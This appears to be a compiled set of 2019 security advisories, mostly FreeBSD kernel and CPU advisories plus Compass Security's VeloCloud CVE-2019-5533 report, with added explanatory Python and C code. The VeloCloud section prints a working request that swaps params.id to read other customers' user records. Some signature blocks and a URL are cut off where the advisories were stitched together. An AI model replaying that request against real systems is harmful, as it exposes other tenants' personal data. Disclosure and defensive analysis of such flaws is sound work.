2. cpucontrol -i 7 /dev/cpuctl0

If bit 29 (0x20000000) is set in the fourth response word (EDX), then the
0x10a MSR (IA32_ARCH_CAPABILITIES) is present.

3. cpucontrol -m 0x10a /dev/cpuctl0

If bit 8 (0x100) of the response word is set, your CPU is not vulnerable to
TAA and no further action is required.

If bit 7 (0x80) is cleared, then your CPU does not have updated microcode
that facilitates TSX to be disabled. The only remedy available is to enable
the MDS mitigation, as documented above.

4. cpucontrol -m 0x122=3 /dev/cpuctl0

This writes the IA32_TSX_CTRL MSR (0x122) with both RTM_DISABLE (bit 0) and
TSX_CPUID_CLEAR (bit 1) set. Repeat step 4 for each numbered CPU that is
present.

A future kernel change to FreeBSD will provide automatic detection and
mitigation for TAA.

LLVM 9.0 will be updated in FreeBSD 13-current to address the JCC
performance impact. Updates to prior versions of LLVM are currently being
evaluated.

VI.  Correction details

There are currently no changes in FreeBSD to address this issue.

VII. References

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11135
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11139
https://cve.
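The workaround and solution sections above are a small decision procedure over two cpucontrol(8) readings: CPUID leaf 7 (EBX for HLE/RTM, EDX bit 29 for the presence of IA32_ARCH_CAPABILITIES) and MSR 0x10a (TAA_NO and TSX_CTRL). The following Python helper, added here and not FreeBSD code, parses the text cpucontrol prints and applies the advisory's bit tests so the outcome for a whole machine can be scripted rather than read by eye. It assumes cpucontrol's line formats are "cpuid level 0x7: <eax> <ebx> <ecx> <edx>" and "MSR 0x10a: <high32> <low32>"; the sample lines are constructed and the action strings are this example's own.

```python
"""TAA status decision from cpucontrol(8) output, per FreeBSD-SA-19:26.mcu.

Added illustration, not FreeBSD code. Assumed cpucontrol line formats:
  "cpuid level 0x7: 0x... 0x... 0x... 0x..."   (eax ebx ecx edx)
  "MSR 0x10a: 0x... 0x..."                     (high 32 bits, low 32 bits)
"""
import re

# CPUID.(EAX=7,ECX=0):EBX
CPUID7_EBX_HLE = 1 << 4          # 0x10
CPUID7_EBX_RTM = 1 << 11         # 0x800
# CPUID.(EAX=7,ECX=0):EDX
CPUID7_EDX_ARCH_CAPABILITIES = 1 << 29   # 0x20000000: MSR 0x10a exists
# IA32_ARCH_CAPABILITIES (MSR 0x10a), low word
ARCH_CAP_TSX_CTRL = 1 << 7       # 0x80: microcode lets TSX be disabled
ARCH_CAP_TAA_NO = 1 << 8         # 0x100: CPU not vulnerable to TAA

_CPUID_RE = re.compile(
    r"cpuid level 0x7\b[^:]*:\s*(0x[0-9a-f]+)\s+(0x[0-9a-f]+)\s+(0x[0-9a-f]+)\s+(0x[0-9a-f]+)",
    re.IGNORECASE)
_MSR_RE = re.compile(r"MSR 0x([0-9a-f]+):\s*(0x[0-9a-f]+)\s+(0x[0-9a-f]+)", re.IGNORECASE)


def parse_cpuid7(line):
    """Return (eax, ebx, ecx, edx) from a `cpucontrol -i 7` output line."""
    m = _CPUID_RE.search(line)
    if not m:
        raise ValueError("not a cpuid level 0x7 line: %r" % line)
    return tuple(int(word, 16) for word in m.groups())


def parse_msr(line):
    """Return (msr_number, 64-bit value) from a `cpucontrol -m` output line."""
    m = _MSR_RE.search(line)
    if not m:
        raise ValueError("not an MSR line: %r" % line)
    msr, high, low = (int(x, 16) for x in m.groups())
    return msr, (high << 32) | low


def assess_taa(cpuid7_line, msr_0x10a_line=None):
    """Apply the advisory's decision procedure for one CPU.

    The MSR line may be omitted when CPUID reports no IA32_ARCH_CAPABILITIES;
    without it neither TAA_NO nor TSX_CTRL can be claimed.
    """
    _, ebx, _, edx = parse_cpuid7(cpuid7_line)
    status = {
        # The advisory lists both bits; either one means TSX is present.
        "tsx_present": bool(ebx & (CPUID7_EBX_HLE | CPUID7_EBX_RTM)),
        "arch_capabilities_msr": bool(edx & CPUID7_EDX_ARCH_CAPABILITIES),
        "taa_no": False,
        "tsx_ctrl": False,
    }
    if not status["tsx_present"]:
        status["action"] = "none: TSX not present"
        return status
    if status["arch_capabilities_msr"] and msr_0x10a_line is not None:
        msr, value = parse_msr(msr_0x10a_line)
        if msr != 0x10a:
            raise ValueError("expected MSR 0x10a, got 0x%x" % msr)
        status["taa_no"] = bool(value & ARCH_CAP_TAA_NO)
        status["tsx_ctrl"] = bool(value & ARCH_CAP_TSX_CTRL)
    if status["taa_no"]:
        status["action"] = "none: TAA_NO set"
    elif status["tsx_ctrl"]:
        status["action"] = "disable TSX: cpucontrol -m 0x122=3 on every /dev/cpuctlN"
    else:
        status["action"] = "enable MDS mitigation: sysctl hw.mds_disable=1"
    return status


if __name__ == "__main__":
    # Constructed readings: TSX present, MSR 0x10a present, TSX_CTRL available.
    cpuid = "cpuid level 0x7: 0x00000000 0x00000810 0x00000000 0x20000000"
    for low in ("0x00000080", "0x00000100", "0x00000000"):
        print(low, assess_taa(cpuid, "MSR 0x10a: 0x00000000 " + low)["action"])
```

On a live system the two lines come from `cpucontrol -i 7 /dev/cpuctlN` and `cpucontrol -m 0x10a /dev/cpuctlN`, run once per numbered CPU; the MSR write in step 4 likewise has to be repeated per CPU, as the advisory says.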
CVE-2019-5533 - VMware VeloCloud Authorization Bypass
#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product:  VeloCloud
# Vendor:   VMware
# CVE ID:   CVE-2019-5533
# CSNC ID:  CSNC-2019-007
# Subject:  Authorization Bypass
# Risk:     Moderate
# Effect:   Remotely exploitable
# CVSS v3.1 Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
# Author:   Silas Bärtsch
# Date:     10.16.2019
#
#############################################################

Introduction:
-------------
VeloCloud [1], now part of VMware, is an SD-WAN market leader. VMware SD-WAN
by VeloCloud is a key component of the Virtual Cloud Network and is tightly
integrated with NSX Data Center and NSX Cloud to enable customers to extend
consistent networking and security policies from the data center to the
branch to the cloud.

Compass Security [2] identified a vulnerability that allows a VeloCloud
standard admin user to access user information of other VeloCloud customers.

Affected:
---------
Vulnerable:      3.3.0 and 3.2.2
Not vulnerable:  3.3.1

No other version was tested, but older versions are believed to be
vulnerable as well.

Technical Description
---------------------
The standard admin user uses the following HTTP request to retrieve user
information. The request contains an id parameter twice: the outer "id" is
the JSON-RPC request identifier, while "params.id" selects the user record.
The server does not perform any authorization check on params.id. Changing
it returns the user details of the corresponding user, even if that user
belongs to another VeloCloud customer (enterprise).

```
POST /portal/ HTTP/1.1
Host: vco109-usca1.velocloud.net
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://vco109-usca1.velocloud.net/
Content-Type: application/json
x-vco-privileges-version: 1560945325637
X-Requested-With: XMLHttpRequest
Content-Length: 90
Cookie: culture=en-US; velocloud.session=[CUT-BY-COMPASS]
Connection: close

{"jsonrpc":"2.0","method":"enterpriseUser/getEnterpriseUser","params":{"id":1},"id":1}
```

The following information is returned.

```
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 19 Jun 2019 13:02:11 GMT
Content-Type: application/json
Content-Length: 569
Connection: close
X-Powered-By: Express
Set-Cookie: velocloud.message=; Path=/; Expires=Thu, 01 Jan 1970 00:00:00 GMT
x-vco-privileges-version: 1560945325637
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: 0
Strict-Transport-Security: max-age=31536000; includeSubdomains;
X-Frame-Options: SAMEORIGIN

{"jsonrpc":"2.0","result": {
  "id":[CUT-BY-COMPASS],
  "created":"[CUT-BY-COMPASS]",
  "userType":"[CUT-BY-COMPASS]",
  "username":"[CUT-BY-COMPASS]",
  "domain":[CUT-BY-COMPASS],
  "password":"*",
  "firstName":[CUT-BY-COMPASS],
  "lastName":[CUT-BY-COMPASS],
  "officePhone":[CUT-BY-COMPASS],
  "mobilePhone":[CUT-BY-COMPASS],
  "email":"[CUT-BY-COMPASS]",
  "isNative":[CUT-BY-COMPASS],
  "isActive":[CUT-BY-COMPASS],
  "isLocked":[CUT-BY-COMPASS],
  "disableSecondFactor":[CUT-BY-COMPASS],
  "lastLogin":"[CUT-BY-COMPASS]",
  "modified":"[CUT-BY-COMPASS]",
  "passwordModified":"[CUT-BY-COMPASS]",
  "enterpriseId":[CUT-BY-COMPASS],
  "enterpriseProxyId":[CUT-BY-COMPASS],
  "roleId":[CUT-BY-COMPASS],
  "roleName":"[CUT-BY-COMPASS]",
  "networkId":[CUT-BY-COMPASS],
  "isSuper":[CUT-BY-COMPASS]},
 "id":[CUT-BY-COMPASS]
}
```

Workaround / Fix:
-----------------
Upgrade to VeloCloud 3.3.1, where the authorization checks are performed
correctly.

Timeline:
---------
2019-10-16: Coordinated public disclosure date
2019-08-26: Assigned CVE-2019-5533
2019-08-21: Release of VeloCloud 3.3.1 which includes a fix for the vulnerability
2019-07-02: Initial vendor response
2019-07-01: Initial vendor notification
2019-06-27: Assigned CSNC-2019-007
2019-06-19: Discovery by Silas Bärtsch

References:
-----------
[1] https://www.velocloud.com
[2] https://compass-security.com
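The missing check is object-level authorization: the record selected by params.id must belong to the caller's tenant, not merely exist. The following Python sketch is added here and is not VeloCloud code: a minimal JSON-RPC 2.0 dispatcher for the "enterpriseUser/getEnterpriseUser" method from the advisory, with the vulnerable handler (lookup by id alone) next to the fixed one (lookup restricted to the caller's enterpriseId). The user table, the caller model, the meaning given to isSuper (an operator allowed across tenants) and the error codes are assumptions for the demonstration; the field names enterpriseId, roleName and isSuper are taken from the advisory's response.

```python
"""Tenant-scoped authorization for a JSON-RPC user lookup.

Added illustration, not VeloCloud code. The user table, caller model,
isSuper semantics and error codes are assumptions.
"""
import json

# Constructed records: two users belonging to different enterprises (tenants).
USERS = {
    1: {"id": 1, "username": "alice@tenant-a.example", "enterpriseId": 3,
        "roleName": "Enterprise Admin", "isSuper": False},
    2: {"id": 2, "username": "bob@tenant-b.example", "enterpriseId": 7,
        "roleName": "Enterprise Admin", "isSuper": False},
}

NOT_FOUND = {"code": -32000, "message": "user not found"}


def get_enterprise_user_vulnerable(params, caller):
    """Trusts params.id alone: any authenticated user can read any record."""
    return USERS.get(params.get("id"))


def get_enterprise_user_fixed(params, caller):
    """Object-level check: the record must belong to the caller's enterprise
    unless the caller is a cross-tenant operator (assumed isSuper semantics)."""
    user = USERS.get(params.get("id"))
    if user is None:
        return None
    if not caller["isSuper"] and user["enterpriseId"] != caller["enterpriseId"]:
        return None   # same answer as "absent": no cross-tenant existence oracle
    return user


METHODS_VULNERABLE = {"enterpriseUser/getEnterpriseUser": get_enterprise_user_vulnerable}
METHODS_FIXED = {"enterpriseUser/getEnterpriseUser": get_enterprise_user_fixed}


def dispatch(raw_request, caller, methods):
    """Decode one JSON-RPC 2.0 request body and return the response object.

    `caller` stands for the identity bound to the session cookie; it must
    come from the server-side session, never from the request body.
    """
    req = json.loads(raw_request)
    req_id = req.get("id")
    handler = methods.get(req.get("method"))
    if handler is None:
        return {"jsonrpc": "2.0", "error": {"code": -32601, "message": "method not found"}, "id": req_id}
    result = handler(req.get("params") or {}, caller)
    if result is None:
        return {"jsonrpc": "2.0", "error": NOT_FOUND, "id": req_id}
    return {"jsonrpc": "2.0", "result": result, "id": req_id}


# The advisory's request body: params.id points at a user of another tenant.
REQUEST = '{"jsonrpc":"2.0","method":"enterpriseUser/getEnterpriseUser","params":{"id":1},"id":1}'
# Caller: bob, an admin of enterprise 7 (derived from his session, not the body).
CALLER_TENANT_B = {"id": 2, "enterpriseId": 7, "isSuper": False}

if __name__ == "__main__":
    print("vulnerable:", dispatch(REQUEST, CALLER_TENANT_B, METHODS_VULNERABLE))
    print("fixed:     ", dispatch(REQUEST, CALLER_TENANT_B, METHODS_FIXED))
```

Returning the same "not found" error for a foreign record as for a nonexistent one keeps the endpoint from doubling as an id enumeration oracle across tenants; the outer JSON-RPC id is echoed back unchanged because it identifies the message, not the user.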
FreeBSD Security Advisory FreeBSD-SA-19:23.midi [REVISED]
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

=============================================================================
FreeBSD-SA-19:23.midi                                       Security Advisory
                                                          The FreeBSD Project

Topic:          kernel memory disclosure from /dev/midistat

Category:       core
Module:         sound
Announced:      2019-08-20
Credits:        Peter Holm, Mark Johnston
Affects:        All supported versions of FreeBSD.
Corrected:      2019-08-20 17:53:16 UTC (stable/12, 12.0-STABLE)
                2019-08-20 17:50:33 UTC (releng/12.0, 12.0-RELEASE-p10)
                2019-08-20 17:54:18 UTC (stable/11, 11.3-STABLE)
                2019-08-20 17:50:33 UTC (releng/11.3, 11.3-RELEASE-p3)
                2019-08-20 17:50:33 UTC (releng/11.2, 11.2-RELEASE-p14)
CVE Name:       CVE-2019-5612

For general information regarding FreeBSD Security Advisories, including
descriptions of the fields above, security branches, and the following
sections, please visit https://security.FreeBSD.org/.

0.   Revision history

v1.0  2019-08-20  Initial release.
v1.1  2019-08-21  Updated workaround.

I.   Background

/dev/midistat is a device file which can be read to obtain a human-readable
list of the available MIDI-capable devices in the system.

II.  Problem Description

The kernel driver for /dev/midistat implements a handler for read(2). This
handler is not thread-safe, and a multi-threaded program can exploit races
in the handler to cause it to copy out kernel memory outside the boundaries
of midistat's data buffer.

III. Impact

The races allow a program to read kernel memory within a 4GB window centered
at midistat's data buffer. The buffer is allocated each time the device is
opened, so an attacker is not limited to a static 4GB region of memory.

On 32-bit platforms, an attempt to trigger the race may cause a page fault
in kernel mode, leading to a panic.

IV.  Workaround

Restrict permissions on /dev/midistat by adding an entry to /etc/devfs.conf
and restarting the service:

# echo "perm midistat 0600" >> /etc/devfs.conf
# service devfs restart

Custom kernels without "device sound" are not vulnerable.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or release /
security branch (releng) dated after the correction date, and reboot.

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms
can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
# shutdown -r +10min "Rebooting for security update"

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable FreeBSD
release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:23/midi.patch
# fetch https://security.FreeBSD.org/patches/SA-19:23/midi.patch.asc
# gpg --verify midi.patch.asc

b) Apply the patch. Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
https://www.FreeBSD.org/handbook/kernelconfig.html and reboot the system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
-------------------------------------------------------------------------
stable/12/                                                        r351264
releng/12.0/                                                      r351260
stable/11/                                                        r351265
releng/11.3/                                                      r351260
releng/11.2/                                                      r351260
-------------------------------------------------------------------------

To see which files were modified by a particular revision, run the following
command, replacing NN with the revision number, on a machine with Subversion
installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

https://svnweb.freebsd.org/base?view=revision&revision=NN

VII. References

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5612

The latest revision of this advisory is available at
https://security.FreeBSD.org/advisories/FreeBSD-SA-19:23.midi.asc
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl1d58xfFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD
MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n
5cJ3pw//fbHMCysvmMh+2RZ47d4i9d61cdYEq51VUwT2Cp2pGz+mWAoac89c4k2v
coo+nuvsXfgNGjr6SHGjLw0kCjeJPdPBDstHLnrzqbmuUFeS8rbRS9AGy
FreeBSD Security Advisory FreeBSD-SA-19:24.mqueuefs
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

=============================================================================
FreeBSD-SA-19:24.mqueuefs                                   Security Advisory
                                                          The FreeBSD Project

Topic:          Reference count overflow in mqueue filesystem 32-bit compat

Category:       core
Module:         kernel
Announced:      2019-08-20
Credits:        Karsten König, Secfault Security
Affects:        All supported versions of FreeBSD.
Corrected:      2019-08-20 17:45:22 UTC (stable/12, 12.0-STABLE)
                2019-08-20 17:51:32 UTC (releng/12.0, 12.0-RELEASE-p10)
                2019-08-20 17:46:22 UTC (stable/11, 11.3-STABLE)
                2019-08-20 17:51:32 UTC (releng/11.3, 11.3-RELEASE-p3)
                2019-08-20 17:51:32 UTC (releng/11.2, 11.2-RELEASE-p14)
CVE Name:       CVE-2019-5603

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <https://security.FreeBSD.org/>.

Note: This issue is related to the previously disclosed SA-19:15.mqueuefs.
It is another instance of the same bug and as such shares the same CVE.

I.   Background

mqueuefs(5) implements POSIX message queue file system which can be used by
processes as a communication mechanism.

'struct file' represents open files, directories, sockets and other
entities.

II.  Problem Description

System calls operating on file descriptors obtain a reference to relevant
struct file which due to a programming error was not always put back, which
in turn could be used to overflow the counter of affected struct file.

III. Impact

A local user can use this flaw to obtain access to files, directories,
sockets, etc., opened by processes owned by other users.  If obtained struct
file represents a directory from outside of user's jail, it can be used to
access files outside of the jail.  If the user in question is a jailed root
they can obtain root privileges on the host system.

IV.  Workaround

No workaround is available.  Note that the mqueuefs file system is not
enabled by default.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date,
and reboot.

Perform one of the following:

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
# shutdown -r +10min "Security update"

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:24/mqueuefs.patch
# fetch https://security.FreeBSD.org/patches/SA-19:24/mqueuefs.patch.asc
# gpg --verify mqueuefs.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/12/                                                        r351255
releng/12.0/                                                      r351261
stable/11/                                                        r351257
releng/11.3/                                                      r351261
releng/11.2/                                                      r351261
- -------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a machine
with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5603>

The latest revision of this advisory is available at
<https://security.FreeBSD.org/advisories/FreeBSD-SA-19:24.mqueuefs.asc>
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl1cPglfFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD
MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n
5cIKGA/+Oh+ORvFs273SJwaYaf8LCJ21IJnzVxDp9vS6MSO79LmI6HeiqAy9apQs
Ec4zOXvE5MzYfA+E9jyRa6c4h7OY7uSSym15wCjLLi+DWPJ1lcCPAv01JuAgSw9E
GkLOprdk2a
FreeBSD Security Advisory FreeBSD-SA-19:23.midi
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

=============================================================================
FreeBSD-SA-19:23.midi                                       Security Advisory
                                                          The FreeBSD Project

Topic:          kernel memory disclosure from /dev/midistat

Category:       core
Module:         sound
Announced:      2019-08-20
Credits:        Peter Holm, Mark Johnston
Affects:        All supported versions of FreeBSD.
Corrected:      2019-08-20 17:53:16 UTC (stable/12, 12.0-STABLE)
                2019-08-20 17:50:33 UTC (releng/12.0, 12.0-RELEASE-p10)
                2019-08-20 17:54:18 UTC (stable/11, 11.3-STABLE)
                2019-08-20 17:50:33 UTC (releng/11.3, 11.3-RELEASE-p3)
                2019-08-20 17:50:33 UTC (releng/11.2, 11.2-RELEASE-p14)
CVE Name:       CVE-2019-5612

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <https://security.FreeBSD.org/>.

I.   Background

/dev/midistat is a device file which can be read to obtain a human-readable
list of the available MIDI-capable devices in the system.

II.  Problem Description

The kernel driver for /dev/midistat implements a handler for read(2).  This
handler is not thread-safe, and a multi-threaded program can exploit races
in the handler to cause it to copy out kernel memory outside the boundaries
of midistat's data buffer.

III. Impact

The races allow a program to read kernel memory within a 4GB window centered
at midistat's data buffer.  The buffer is allocated each time the device is
opened, so an attacker is not limited to a static 4GB region of memory.

On 32-bit platforms, an attempt to trigger the race may cause a page fault in
kernel mode, leading to a panic.

IV.  Workaround

No workaround is available.  Custom kernels without "device sound" are not
vulnerable.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date,
and reboot.

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
# shutdown -r +10min "Rebooting for security update"

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:23/midi.patch
# fetch https://security.FreeBSD.org/patches/SA-19:23/midi.patch.asc
# gpg --verify midi.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/12/                                                        r351264
releng/12.0/                                                      r351260
stable/11/                                                        r351265
releng/11.3/                                                      r351260
releng/11.2/                                                      r351260
- -------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a machine
with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5612>

The latest revision of this advisory is available at
<https://security.FreeBSD.org/advisories/FreeBSD-SA-19:23.midi.asc>
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl1cPgVfFIAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEZD
MEU4NzhBRTVBRkU3ODgwMjhENjM1NUQzOTc5MkY0OUVBN0U1QzIACgkQ05eS9J6n
5cItmQ/9HL5BIP/QUvfcBbhZmZAXa7O7V9Em4auumaUWEPnUaAR0vNKZqMvFXNeN
v51/HOwCZte2fCgs8rxSH9ncQR+cUk/3nXO7PZ7pNPNfvuJoPlCV1rIuRrdwm14+
+pZIJpY65gmmXyh5Qa5cw41MEWuDcKluUg38zEROwBpX4h0J/ZuMSARn/s1jj/kJ
hy2yzgPTz8gAzkNd8OtQm1CHdFnKWabuAHBlltj9qIA3OvJL+TpIFmzU5jA7wO1n
w9GCcz73+IA1RZXu8vPsW9AEc/1LlUrNcyLmJ+bZjW9b7mY9dq+ackvULTzFV21u
5xW2FEX3EBr3kFSbWyIS9zuTX4InftoAr97CBxNMYa25/0En4Ri2rB3oH49
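The SA-19:23 problem description (both revisions above) is a check-then-use race on shared device state inside a read(2) handler. The following is an added example, not the FreeBSD midistat driver: a user-space model in which racy_read_extent() has the shape of the flaw (the device length is consulted twice with no lock, and a second thread can re-open the device in between) and safe_read() is the corrected shape (one snapshot under a lock, copy bounded by that snapshot). All names are hypothetical, and shrink_racer stands in for the competing thread.

```c
/*
 * Added example, not the FreeBSD midistat driver: a device read handler
 * modelled in user space.  racy_read_extent() has the shape of the flaw
 * (shared device state consulted twice without a lock); safe_read() is the
 * corrected shape.  All names here are hypothetical, and 'racer' stands in
 * for a second thread that re-opens the device inside the window.
 */
#include <pthread.h>
#include <stddef.h>
#include <string.h>

struct midistat_sc {
    pthread_mutex_t lock;
    char *buf;          /* text generated when the device was opened */
    size_t len;         /* valid bytes in buf */
};

/*
 * Racy shape.  The bounds check and the length arithmetic read sc->len
 * separately.  If another thread replaces the buffer in between (racer),
 * 'sc->len - off' underflows, is clamped only by resid, and the caller
 * would copyout() resid bytes starting past the end of the new buffer.
 * Only the would-be copy extent is returned; nothing is actually copied.
 */
void racy_read_extent(struct midistat_sc *sc, size_t off, size_t resid,
                      void (*racer)(struct midistat_sc *),
                      size_t *start, size_t *count)
{
    *start = off;
    *count = 0;
    if (off >= sc->len)             /* check against the current length */
        return;
    if (racer != NULL)
        racer(sc);                  /* the race window */
    size_t n = sc->len - off;       /* use: length re-read, may have shrunk */
    if (n > resid)
        n = resid;
    *count = n;
}

/* Stand-in for the racing thread: the device is re-opened and its buffer
 * shrinks to 4 bytes (constructed for the example). */
void shrink_racer(struct midistat_sc *sc)
{
    sc->len = 4;
}

/* Fixed shape: take the lock, work from one snapshot of len, and bound the
 * copy by that snapshot.  Returns the number of bytes copied to dst. */
size_t safe_read(struct midistat_sc *sc, size_t off, size_t resid, char *dst)
{
    size_t n = 0;
    pthread_mutex_lock(&sc->lock);
    size_t len = sc->len;
    if (off < len) {
        n = len - off;
        if (n > resid)
            n = resid;
        memcpy(dst, sc->buf + off, n);
    }
    pthread_mutex_unlock(&sc->lock);
    return n;
}

/* True when the byte range [start, start+count) is not inside [0, len). */
int extent_out_of_bounds(size_t start, size_t count, size_t len)
{
    return count != 0 && (start >= len || count > len - start);
}
```

The racer is injected as a callback so the window is hit deterministically; in the real driver it is a second thread winning a scheduling race, which is why the advisory's only reliable mitigation short of the patch is to take the device away from untrusted users (the devfs.conf entry in revision v1.1).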
FreeBSD Security Advisory FreeBSD-SA-19:22.mbuf
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

=============================================================================
FreeBSD-SA-19:22.mbuf                                       Security Advisory
                                                          The FreeBSD Project

Topic:          IPv6 remote Denial-of-Service

Category:       kernel
Module:         net
Announced:      2019-08-20
Credits:        Clement Lecigne
Affects:        All supported versions of FreeBSD.
Corrected:      2019-08-10 00:01:25 UTC (stable/12, 12.0-STABLE)
                2019-08-20 17:49:33 UTC (releng/12.0, 12.0-RELEASE-p10)
                2019-08-10 00:02:45 UTC (stable/11, 11.3-STABLE)
                2019-08-20 17:49:33 UTC (releng/11.3, 11.3-RELEASE-p3)
                2019-08-20 17:49:33 UTC (releng/11.2, 11.2-RELEASE-p14)
CVE Name:       CVE-2019-5611

For general information regarding FreeBSD Security Advisories,
including descriptions of the fields above, security branches, and the
following sections, please visit <https://security.FreeBSD.org/>.

I.   Background

mbufs are a unit of memory management mostly used in the kernel for network
packets and socket buffers.  m_pulldown(9) is a function to arrange the data
in a chain of mbufs.

II.  Problem Description

Due to a missing check in the code of m_pulldown(9), data returned may not
be contiguous as requested by the caller.

III. Impact

Extra checks in the IPv6 code catch the error condition and trigger a kernel
panic leading to a remote DoS (denial-of-service) attack with certain
Ethernet interfaces.

At this point it is unknown if any other than the IPv6 code paths can trigger
a similar condition.

IV.  Workaround

For the currently known attack vector systems with IPv6 not enabled are not
vulnerable.

On systems with IPv6 active, IPv6 fragmentation may be disabled, or a
firewall can be used to filter out packets with certain or excessive amounts
of extension headers in a first fragment.  These rules may be dependent on
the operational needs of each site.

V.   Solution

Upgrade your vulnerable system to a supported FreeBSD stable or
release / security branch (releng) dated after the correction date,
and reboot.

1) To update your vulnerable system via a binary patch:

Systems running a RELEASE version of FreeBSD on the i386 or amd64
platforms can be updated via the freebsd-update(8) utility:

# freebsd-update fetch
# freebsd-update install
# shutdown -r +10min "Rebooting for security update"

2) To update your vulnerable system via a source code patch:

The following patches have been verified to apply to the applicable
FreeBSD release branches.

a) Download the relevant patch from the location below, and verify the
detached PGP signature using your PGP utility.

# fetch https://security.FreeBSD.org/patches/SA-19:22/mbuf.patch
# fetch https://security.FreeBSD.org/patches/SA-19:22/mbuf.patch.asc
# gpg --verify mbuf.patch.asc

b) Apply the patch.  Execute the following commands as root:

# cd /usr/src
# patch < /path/to/patch

c) Recompile your kernel as described in
<https://www.FreeBSD.org/handbook/kernelconfig.html> and reboot the
system.

VI.  Correction details

The following list contains the correction revision numbers for each
affected branch.

Branch/path                                                      Revision
- -------------------------------------------------------------------------
stable/12/                                                        r350828
releng/12.0/                                                      r351259
stable/11/                                                        r350829
releng/11.3/                                                      r351259
releng/11.2/                                                      r351259
- -------------------------------------------------------------------------

To see which files were modified by a particular revision, run the
following command, replacing NN with the revision number, on a machine
with Subversion installed:

# svn diff -cNN --summarize svn://svn.freebsd.org/base

Or visit the following URL, replacing NN with the revision number:

<https://svnweb.freebsd.org/base?view=revision&revision=NN>

VII. References

<https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=238787>
<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5611>

The latest revision of this advisory is available at
<https://security.FreeBSD.org/advisories/FreeBSD-SA-19:22.mbuf.asc>
